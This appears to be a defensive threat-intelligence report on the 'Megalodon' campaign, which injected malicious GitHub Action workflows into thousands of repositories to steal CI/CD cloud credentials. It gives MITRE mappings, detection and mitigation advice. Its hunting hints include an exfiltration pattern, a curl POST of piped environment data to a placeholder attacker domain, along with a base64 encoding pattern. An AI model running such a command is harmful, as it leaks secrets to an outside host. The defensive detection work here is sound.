Massive 'Megalodon' Supply Chain Attack Compromises 5,500+ GitHub Repos to Steal Cloud Credentials

Executive Summary

A sophisticated and large-scale software supply chain attack, dubbed Megalodon, has been uncovered, impacting more than 5,500 GitHub repositories. The attack, attributed to a threat actor known as TeamPCP, involved injecting malicious code into GitHub Action workflows. The primary objective was the mass theft of sensitive credentials and secrets stored within continuous integration and continuous deployment (CI/CD) environments. This incident is part of a broader campaign that also included compromises of packages in the npm and PyPI ecosystems, highlighting a significant and ongoing threat to the software development lifecycle. The Cybersecurity and Infrastructure Security Agency (CISA) has responded with a warning to organizations about compromises in software development pipelines.

Threat Overview

The Megalodon attack took place on May 18, 2026, with attackers making over 5,700 malicious commits to thousands of public repositories in just six hours. The attack had two primary payloads delivered via malicious GitHub Action workflows:

Active Credential Theft: A new malicious workflow was added to repositories, configured to trigger on every push and pull_request event. This workflow would then exfiltrate secrets and environment variables.
Dormant Backdoor: Existing, legitimate workflows were replaced with malicious versions containing a dormant backdoor, which could be activated by the attackers at a later time.

The exfiltrated data was extensive, including CI environment variables, AWS credentials, GCP access tokens, Azure credentials, API tokens, and SSH keys. This attack was the second wave of a campaign; the first, named "Mini Shai-Hulud" (April 29 - May 12, 2026), was a self-propagating worm that compromised 172 packages on npm and PyPI.

Technical Analysis

The attack is a classic example of CI/CD pipeline compromise, focusing on a weak link in the software supply chain: automated build processes.

MITRE ATT&CK Techniques

T1195.001 - Compromise Software Dependencies and Development Tools: The core of the attack was compromising GitHub repositories and injecting malicious GitHub Actions, a key development tool.
T1078.001 - Default Credentials: The attackers likely gained initial access to the repositories by using compromised developer credentials or tokens, which may have been stolen in previous campaigns or leaked elsewhere.
T1552.005 - Cloud Credentials: The primary objective was to steal cloud credentials stored as secrets or environment variables within the GitHub Actions environment.
T1040 - Network Sniffing: While not sniffing in the traditional sense, the malicious workflow effectively 'sniffs' the CI/CD environment for any available secrets and exfiltrates them.
T1548.004 - Elevated Execution with Scheduled Job: The GitHub Action, which runs on events like push, acts as a scheduled job that executes the attacker's malicious code within the trusted context of the repository's runner.

Impact Assessment

The Megalodon attack poses a severe risk to the software ecosystem. By compromising 5,500 repositories, the attackers have potentially gained access to the cloud environments of thousands of organizations and individual developers. This access could be used for cryptojacking, data theft, or as a launchpad for further, more targeted attacks. Furthermore, if any of these repositories are popular open-source projects, the malicious workflows could be forked and used by countless downstream users, propagating the compromise exponentially. The theft of API tokens and SSH keys could also lead to the compromise of other services beyond cloud providers, such as package registries, databases, and internal servers.

IOCs — Directly from Articles

No specific file hashes or IP addresses were provided in the source articles. The primary indicator is the presence of unauthorized or modified GitHub Action workflow files.

Cyber Observables — Hunting Hints

Security teams should hunt for the following patterns within their GitHub organizations:

Type

file_path

Value

/.github/workflows/

Description

Monitor for unexpected or unauthorized commits that add or modify files in this directory.

Type

command_line_pattern

Value

`env

Description

base64`

Type

command_line_pattern

Value

curl -X POST -d @- http://<attacker-domain>

Description

Search for workflow run commands that use curl or wget to send data to an external, non-standard domain.

Type

log_source

Value

GitHub Audit Logs

Description

Audit for commits made by unknown or suspicious user accounts, especially if they modify workflow files across multiple repositories in a short time frame.

Detection & Response

Audit GitHub Actions: Immediately conduct a thorough audit of all .github/workflows/ files in all repositories. Look for any recently added or modified workflows, especially those committed by unfamiliar accounts or containing suspicious run steps.
Workflow Monitoring (D3-SFA): Implement continuous monitoring of workflow files. Use tools or custom scripts to alert on any changes to these critical files and require a manual review before they are merged into main branches.
Credential Rotation: If a repository is found to be compromised, assume all secrets and credentials associated with it are stolen. Immediately rotate all GITHUB_TOKENs, cloud provider keys, API tokens, and any other secrets stored in GitHub Secrets for that repository.
Analyze Runner Logs: Investigate the execution logs of GitHub Actions runners for any signs of compromise, such as unexpected network connections, file modifications, or command executions.

Mitigation

Securing the CI/CD pipeline is critical to preventing such attacks.

Principle of Least Privilege (D3-UAP): Configure GitHub Actions workflows with the minimum permissions necessary. Use the permissions key in the workflow file to restrict the default read/write permissions of the GITHUB_TOKEN.
Use OIDC for Cloud Authentication: Instead of storing long-lived static credentials (e.g., AWS keys) in GitHub Secrets, switch to OpenID Connect (OIDC). This allows workflows to request short-lived access tokens directly from the cloud provider, eliminating the risk of stolen static secrets.
Require Workflow Approval: For public repositories, enable the setting that requires approval from a maintainer for any pull request from a first-time contributor that modifies GitHub Actions workflows.
Pin Third-Party Actions: When using third-party actions from the GitHub Marketplace, pin them to a specific commit hash (user/action@commit-hash) rather than a branch or tag (user/action@v1). This prevents the action from being maliciously updated without your knowledge.

In the context of the Megalodon attack, System File Analysis means continuous, automated analysis of workflow files (*.yml) within the .github/workflows/ directory. Organizations should deploy tools that act as a 'CI/CD firewall.' These tools can be integrated as status checks on pull requests, automatically scanning any proposed changes to workflow files. The analysis should look for suspicious patterns, such as the use of curl or wget to exfiltrate data to unknown domains, the execution of obfuscated scripts (e.g., using base64), or the addition of new, unverified third-party actions. By creating a baseline of known-good workflow behavior and alerting on any deviation, security teams can detect and block malicious commits before they are merged into the main branch and executed, effectively preventing the compromise.

'Megalodon' Supply Chain Attack by TeamPCP Infects Over 5,500 GitHub Repositories with Malicious GitHub Actions